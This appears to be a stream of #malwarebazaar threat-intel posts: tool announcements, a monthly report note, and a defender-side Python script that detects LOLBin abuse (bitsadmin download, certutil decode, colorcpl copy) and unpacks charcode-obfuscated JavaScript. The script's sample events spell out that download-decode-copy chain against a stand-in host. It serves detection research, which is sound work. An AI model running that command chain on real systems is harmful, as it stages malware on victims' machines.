A lnk file that downloads JavaScript from #malwarebazaar. This one uses lolbins like certutil for base64 decode, bitsadmin for download, and colorcpl for file copy. Also lots of JavaScript charcode obfuscation.
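The post names three LOLBins chained from a .lnk (bitsadmin to download, certutil to base64-decode, colorcpl to copy the result) plus JavaScript charcode obfuscation. The following is an added example from the defender's side, not code from the post's author or from MalwareBazaar: a small detection pass over constructed process-creation events that flags each LOLBin only when its arguments match the misuse described, and a deobfuscator that folds `String.fromCharCode(...)` calls with literal numeric arguments back into plain strings. The sample events and the JavaScript fragment are constructed for the example; the rule that colorcpl.exe with a non-colour-profile argument is suspicious relies on its documented behaviour of copying the given file into the system colour-profile directory.

```python
import re
from typing import Callable, Dict, List, Tuple

# Constructed sample process-creation events (not real telemetry): the chain
# the post describes, interleaved with benign uses of the same binaries.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": "bitsadmin.exe",
     "cmdline": "bitsadmin /transfer upd /download /priority normal "
                "http://example.invalid/p.txt C:\\Users\\Public\\p.txt"},
    {"image": "certutil.exe",
     "cmdline": "certutil -decode C:\\Users\\Public\\p.txt C:\\Users\\Public\\p.js"},
    {"image": "colorcpl.exe", "cmdline": "colorcpl C:\\Users\\Public\\p.js"},
    # benign noise that must not be flagged
    {"image": "certutil.exe", "cmdline": "certutil -verify C:\\temp\\cert.cer"},
    {"image": "bitsadmin.exe", "cmdline": "bitsadmin /list"},
    {"image": "colorcpl.exe", "cmdline": "colorcpl C:\\temp\\monitor.icm"},
    {"image": "colorcpl.exe", "cmdline": "colorcpl"},
]


def _certutil_decode(args: List[str]) -> bool:
    # certutil acting as a base64 decoder: any "-decode" / "/decode" switch
    return any(a.lower().lstrip("-/") == "decode" for a in args)


def _bitsadmin_download(args: List[str]) -> bool:
    # bitsadmin job creation that pulls from a web URL
    lowered = [a.lower() for a in args]
    return "/transfer" in lowered and any(re.match(r"https?://", a) for a in lowered)


def _colorcpl_copy(args: List[str]) -> bool:
    # colorcpl copies its file argument into the system colour-profile folder;
    # a non-.icc/.icm argument means it is being used as a copy primitive
    return any(not a.lower().endswith((".icc", ".icm")) for a in args)


# image name -> (argument check, reason reported on a hit)
RULES: Dict[str, Tuple[Callable[[List[str]], bool], str]] = {
    "certutil.exe": (_certutil_decode, "certutil used as base64 decoder"),
    "bitsadmin.exe": (_bitsadmin_download, "bitsadmin used to download from the web"),
    "colorcpl.exe": (_colorcpl_copy, "colorcpl handed a non-colour-profile file (file copy)"),
}


def flag_lolbin_events(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (image, reason) for every event whose arguments match a rule."""
    hits = []
    for ev in events:
        rule = RULES.get(ev["image"].lower())
        if rule is None:
            continue
        check, reason = rule
        args = ev["cmdline"].split()[1:]  # drop the program name itself
        if check(args):
            hits.append((ev["image"], reason))
    return hits


# String.fromCharCode(...) with only decimal or hex integer literals; calls
# whose arguments are expressions or variables are deliberately left alone.
_NUM = r"(?:0[xX][0-9a-fA-F]+|\d+)"
_FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(\s*(" + _NUM + r"(?:\s*,\s*" + _NUM + r")*)\s*\)")


def _parse_int(token: str) -> int:
    token = token.strip()
    return int(token, 16) if token.lower().startswith("0x") else int(token, 10)


def decode_charcodes(js: str) -> str:
    """Replace literal String.fromCharCode(...) calls with a quoted JS string."""
    def repl(m: "re.Match[str]") -> str:
        text = "".join(chr(_parse_int(c)) for c in m.group(1).split(","))
        escaped = text.replace("\\", "\\\\").replace('"', '\\"')
        return '"' + escaped + '"'
    return _FROMCHARCODE.sub(repl, js)


if __name__ == "__main__":
    for image, reason in flag_lolbin_events(SAMPLE_EVENTS):
        print(f"{image}: {reason}")
    # constructed obfuscated fragment, not taken from the sample in the post
    sample_js = 'var u=String.fromCharCode(104,116,116,112)+"://"+String.fromCharCode(0x65,0x78);'
    print(decode_charcodes(sample_js))
```

Running the block prints one line per flagged event (three hits, in chain order) and the deobfuscated fragment `var u="http"+"://"+"ex";`. The argument-level checks matter: each of these binaries has routine administrative uses, so keying an alert on the image name alone would drown in noise, while the decoded JavaScript is what you feed to a second pass that looks for the download URL and the dropped path.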
We have just published our report for December 2022, providing you some insights into malware trends across our platforms, including #URLhaus and #MalwareBazaar 🪲🔎👀
Just pushed an update for malwarebazaar, my little Python/CLI API client for @abuse_ch #MalwareBazaar. Originally just used for querying bazaar itself, now it's possible to query #YARAify, too. Additionally the CLI was updated to provide a richer (haha - https://rich.readthedocs.io/) output. You can find the new version on Github (https://github.com/3c7/bazaar/releases/tag/v0.2.0) and on PyPI via `malwarebazaar`.
#malwarebazaar #yaraify #threatintel #malware
Some additions, improvements, and fixes coming to #mlget soon.
https://github.com/xorhex/mlget
Mlget is a #malware downloader, allowing you to download from the following services:
#capesandbox
#filescanio
#hybridanalysis
#inquests
#joesandbox
#malpedia
#malshare / @malshare
#malwarebazaar
#mwdb
#objectivesee
#polyswarm
#triage
#unpacme
#urlscanio <-- NEW ADDITION COMING
#vt /#virustotal
#vxshare / @VXShare
It can also download and automatically upload to an MWDB instance of your choice.
#mlget #malware #capesandbox #filescanio #HybridAnalysis #Inquests #joesandbox #malpedia #malshare #malwarebazaar #mwdb #objectivesee #polyswarm #triage #unpacme #urlscanio #vt #vxshare
Hm, @abuse_ch requires a Twitter account to log in to #Malwarebazaar. I don't have that any more.